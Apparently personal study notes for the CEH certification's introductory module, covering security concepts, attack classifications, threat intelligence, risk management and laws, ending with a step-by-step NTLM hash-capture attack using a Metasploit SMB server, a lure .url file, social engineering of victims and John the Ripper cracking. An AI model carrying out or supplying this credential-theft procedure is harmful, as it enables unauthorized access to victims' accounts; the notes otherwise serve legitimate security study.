CEH Module1 – Intro, Concepts, Standards

Elements of Information Security – CIA

ConfidentialityAssurance that the information only to those authorized to have access
IntegrityThe trustworthiness of data and resources in terms of preventing improper or unauthorized changes
AvailabilityAssurance that the systems reponsible for delivering, storing and procress information are accessible when required by the authorized users
AuthenticityRefers to the characteristic of a communication, document or any data that ensures the quality of being genuine
Non-RepudiationA guarantee that the sender of a message cannot later deny having sent the message and that the recipient cannot deny having received the message

Classification of Attacks

Passive– do not tamper with the data and involve intercepting and monitoring network traffic and data flow on the target network
– Sniffing and eavesdropping
Active– tamper with data in transit or disrupt the communication or services between the systems to bypass or break into secured systems
– DoS, Man in middle, session hijacking, SQL injection
Close in– performed when attacker is in close physical proximity with the target systems or network in order to gather, modify or disrupt access to information
– eavesdropping, shoulder surfing, dumper diving
Insider– using privileged access to violate rules or intentionally cause a threat to the organization’s information or information systems
– theft of physical devices, planting keyloggers, back door and malware
Distribution– tamper with hardware or software prior to installation
– tamper hardware or software at its source or in transit

Information Warfare

C2possess a compromised systems or network
Intelligence-basedsensor-based
Electronicradio-electronic and cryptographic techniques
PsychologicalPropaganda and terror to demoralize
Hackershutdown systems, data errors, theft of services, false messaging, system monitoring access to data
– used virus, logic bombs, Trojan horses, and sniffers to perform these attacks
Economicaffect economy of a business by blocking flow of information
Cyberuse of information systems against the virtual personas of individuals or groups

CEH Hacking Methodology (CHM)

Cyber Kill Chain Methodology

Tactics, Techniques, and Procedures (TTPs)

TacticsTechniquesProcedures
way an attacker preforms the attacktechnical methods used by an attackerorganizational approaches that threat actors follow
tactics for information gathering to perform initial exploitation, privilege escalation, and lateral movement, and to deploy measures for persistent access to the system and other purposesInitial exploitation, setting up and maintaining command and control channels, accessing the target infra, covering tracks of data exfiltrationthe number of actions usually differs depending on the objectives of the procedure and threat actor group

Adversary Behavioral Identification

Internal Reconaissanceenumeration of systems, hosts, processes, execute commands to get local user context, system config, hostname, IP address, active remote systems and programs running.
Use of powershellautomating data exfiltration and launching further attacks.
Unspecified proxy activitiesadversary create and configure multiple domains pointing to the same host, allowing them to switch quickly between domains to avoid detection
Use of Command line interfaceinteract with the target system, browse files, read file content, modify files, create new users, connect to remote systems, download and install malicious code.
HTTP User AgentThe server identifies the connected HTTP client using the user agent field. Adversary can modify the content of the HTTP user agent field to communicate with the compromised system and to carry further attacks.
Command and control servercommunicate remotely with compromised system through encrypted session. Using this encrypted channels to steal data, delete data and launch further attacks
Use of DNS tunnelingUse to obfuscate malicious traffic in the legit traffic carried by common protocols. Use for communication with c2 server, bypass security controls and perform data exfiltration
Use of web shellmanipulate the webserver by creating a shell within a website. Use to gain remote access to functionalities of a server, data exfiltration, file transfer and uploads.
Data stagingtechniques to collect and combine as much data possible.

Indicators of Compromise (IoCs)

Email email service to send malicious data
NetworkC2, malware delivery and identifying details of the OS, browser type and other computer specific information
Host-Basedfilenames, file hashes, registry keys, DLLs and mutex
Behavioralidentify specific behavior related to malicious activities such as code injection into the memory or running the scripts of an application.

MITRE ATT&CK Framework

Diamond Model of Intrusion Analysis

Additional Event Meta-Features

AdversaryHacker
VictimTarget
Capabilitystrategy, methods, procedure, malware, tools
Infrastructurehardware and software connection
Timestamptime and date of the event
Phaseprogress of the attack
Resultoutcome of the event
Directiondirection of the attack, route to victim
Methodologytechniques used to perform the attack
Resourcetools/ technology used to perform the attack
Socio-political relationship between the adversary and victim
Technologyrelationship between infra and capability

Continual/ Adaptive Security Strategy

Defense-in-Depth

Risk Level

Risk levelConsequenceAction
Extreme or HighSerious or imminent danger– immediate measures are required
– identify and impose controls to reduce the risk to a reasonably low level
Mediummoderate danger– immediate action is not required but action should be implement quickly
– identify and impose controls to reduce the risk to a reasonably low level
LowNegligible – Take preventive steps to mitigate the effects of the risk

Risk Matrix

Risk Management

Risk Identificationidentifies the sources
Risk AssessmentAssess the organization’s risk
Risk TreatmentSelects and implements appropriate controls
Risk TrackingEnsures appropriate controls are implemented
Risk ReviewEvaluates the performance

Cyber Threat Intelligence

StrategicHigh-level information on changing risksHigh level executives and management
TacticalInformation on attackers TTPIT service and SOC managers and Administrators
Operational information on specific incoming attackConsumed by Security managers and network defenders
Technicalinformation on specific indicators of compromiseSOC staff and IR team

Threat Intelligence Lifecycle

Threat Modeling

Incident Management

Incident Handling and Response

Role of AI and ML in Cyber Security

Information Security Laws and Standards

Payment Card Industry Data Security Standard (PCI DSS)– Information security standard for organization
– applies to all entitles involved in payment card processing
1S0/IEC 27001:2013– establishing, implementing, maintaining information security management system
– many types of use
Health Insurance Portability and Accountability Act (HIPAA)– use the same health care transactions, code sets and identifiers
– federal protections for the personal health information
– confidentiality, integrity, and availability of electronically protected health information
– standard transaction
– administration simplification rules
Sarbanes Oxley Act (SOX)protect investors and the public
-1 public company accounting oversight board
-2 auditor independence
-3 corporate responsibility
-4 enhanced financial disclosures
-5 analyst conflict of interest
-6 commission resources and authority
-7 studies and reports
-8 corporate and criminal fraud accountability
-9 white collar crime penalty enhancement
-10 corporate tax returns
-11 corporate farud accountability
The Digital Millennium Copyright Act (DMCA) and the Federal– World intellectual property organization
– defines the legal prohibitions
Information Security Management Act (FISMA)– effectiveness of information security controls
General Data Protection Regulation (GDPR)– data privacy and security standard especially on cloud
Data Protection Act 2018 (DPA)– protects individuals
– personal data to be processed lawfully
– conferring rights to obtain and process and to require inaccurate personal data to be rectified
– conferring functions on the commissioner, giving holder of that office responsibility to monitor and enforce their provisions

New Windows zero-day exposes NTLM credentials

A new zero-day vulnerability has been discovered that allows attackers to capture NTLM credentials by simply tricking the target into viewing a malicious file in Windows Explorer.

The flaw was discovered by the 0patch team, a platform that provides unofficial support for end-of-life Windows versions, and was reported to Microsoft. However, no official fix has been released yet.

According to 0patch, the issue, which currently has no CVE ID, impacts all Windows versions from Windows 7 and Server 2008 R2 up to the latest Windows 11 24H2 and Server 2022.

The default port for NTLM authentication is port 445, which is primarily used for SMB (Server Message Block) communication. If this port is open and accessible, attackers can exploit NTLM credential leaks, especially in untrusted network environments. This could allow unauthorized access to sensitive systems and, when combined with other attack vectors, enable further actions such as lateral movement or establishing command-and-control (C&C) infrastructure. Therefore, securing port 445 is critical to mitigate such risks.

https://www.bleepingcomputer.com/news/security/new-windows-zero-day-exposes-ntlm-credentials-gets-unofficial-patch/

Exploit that might work. (this is for educational purpose, hacking is bad, don’t hack)

1. Set Up the Metasploit Listener

Start Metasploit:

msfconsole

Use the auxiliary module to create a malicious SMB server:

use auxiliary/server/capture/smb
set SRVHOST <your_attack_machine_IP>
set SRVPORT 445
set JOHNPWFILE /tmp/hashes.john
set CHALLENGE 1122334455667788
run

This creates an SMB server to capture NTLMv2 hashes when a Windows user connects to it.

2. Create a Malicious File

Craft a file containing a link to your SMB server. For example:

[InternetShortcut]
URL=file:///fake

Save the file as something enticing, e.g., ReadMe.url.

3. Host or Distribute the Malicious File

  • Email the malicious .url file to the victim.
  • Host it on a shared drive or external USB.
  • Use social engineering to trick the user into opening the file.

4. Capture NTLM Hashes

Monitor your Metasploit or Responder console for NTLM hash captures.

5. Crack NTLM Hashes

Use John the Ripper to crack captured hashes:

john /tmp/hashes.john --wordlist=/usr/share/wordlists/rockyou.txt

Defensive Measures:

  • Disable NTLM authentication on Windows systems.
  • Regularly apply Windows updates.
  • Use SMB signing to mitigate NTLM relay attacks.